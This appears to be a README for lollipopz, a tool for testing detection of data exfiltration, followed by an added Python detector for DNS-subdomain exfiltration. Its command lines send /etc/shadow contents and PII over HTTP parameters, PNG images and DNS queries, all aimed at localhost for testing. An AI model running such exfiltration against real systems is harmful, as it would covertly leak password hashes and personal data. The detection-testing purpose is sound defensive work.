lollipopz: a utility for testing different data exfiltration techniques

lollipopz is a simple but useful tool for testing the detection of different data exfiltration techniques, always for legal tests, of course ;)


Installation

$ git clone https://github.com/tasooshi/lollipopz.git
$ cd lollipopz
$ pip install -r requirements.txt


/etc/shadow -> HTTP GET requests

Server

# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log

Client

$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

/etc/shadow -> HTTP POST requests

Server

# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTServer -lp 80 -o output.log

Client

$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

PII -> PNG embedded in HTTP Response

Server

$ ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Server -lp 37650 -o output.log

Client

# ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r

PII -> DNS subdomains querying

Server

# ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Server -lp 53 -o output.log

Client

$ ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r
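
Since the point of these runs is to check whether your detection fires, here is a minimal detector for the DNS subdomain case. It is an added example, not code from lollipopz or from the original post, and it assumes nothing about how lollipopz encodes data: it only flags a client that sends many unique, long, high-entropy subdomains under one parent domain. The log format, the domain names, the thresholds and the "last two labels" parent rule are assumptions made for this example (a production pipeline would use the Public Suffix List).

```python
import math
from collections import Counter, defaultdict

# Constructed sample: "<time> <client_ip> <qname>" (log format is an assumption).
SAMPLE_LOG = """\
12:00:01 10.0.0.23 www.example.com
12:00:02 10.0.0.23 mail.example.com
12:00:02 10.0.0.23 api.example.com
12:00:03 10.0.0.23 cdn.example.com
12:00:04 10.0.0.7 d1a2b3c4e5f6g7h8i9j0k1l2.cdn.example.net
12:00:05 10.0.0.23 k7q2m9x4b1z8v3n6c5j0hwtr.exfil-test.example
12:00:05 10.0.0.23 p3f8a1d6g0s5l2e9u4y7oi2k.exfil-test.example
12:00:06 10.0.0.23 t4r9w2z7y1x6v0u5s8q3pacb.exfil-test.example
12:00:06 10.0.0.23 h2j7k0l5m8n3b6c1d9f4gevx.exfil-test.example
"""

def entropy(s):
    """Shannon entropy of s in bits per character."""
    counts = Counter(s)
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def parse(log):
    """Yield (client, subdomain, parent); parent is naively the last two labels."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        labels = parts[2].rstrip(".").lower().split(".")
        if len(labels) >= 3:  # skip names with no subdomain part
            yield parts[1], ".".join(labels[:-2]), ".".join(labels[-2:])

def suspicious_parents(log, min_unique=4, min_len=20, min_entropy=3.5):
    """Return {(client, parent): stats} where all three thresholds are met."""
    seen = defaultdict(set)
    for client, sub, parent in parse(log):
        seen[(client, parent)].add(sub)
    hits = {}
    for key, subs in seen.items():
        avg_len = sum(map(len, subs)) / len(subs)
        avg_ent = sum(entropy(s.replace(".", "")) for s in subs) / len(subs)
        if len(subs) >= min_unique and avg_len >= min_len and avg_ent >= min_entropy:
            hits[key] = {"unique": len(subs), "avg_len": round(avg_len, 1),
                         "avg_entropy": round(avg_ent, 2)}
    return hits

if __name__ == "__main__":
    for (client, parent), stats in suspicious_parents(SAMPLE_LOG).items():
        print(client, parent, stats)
```

Requiring all three conditions together is what keeps the four short example.com lookups and the single long CDN-style name out of the results; tune the thresholds against your own resolver logs before and after a test run.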
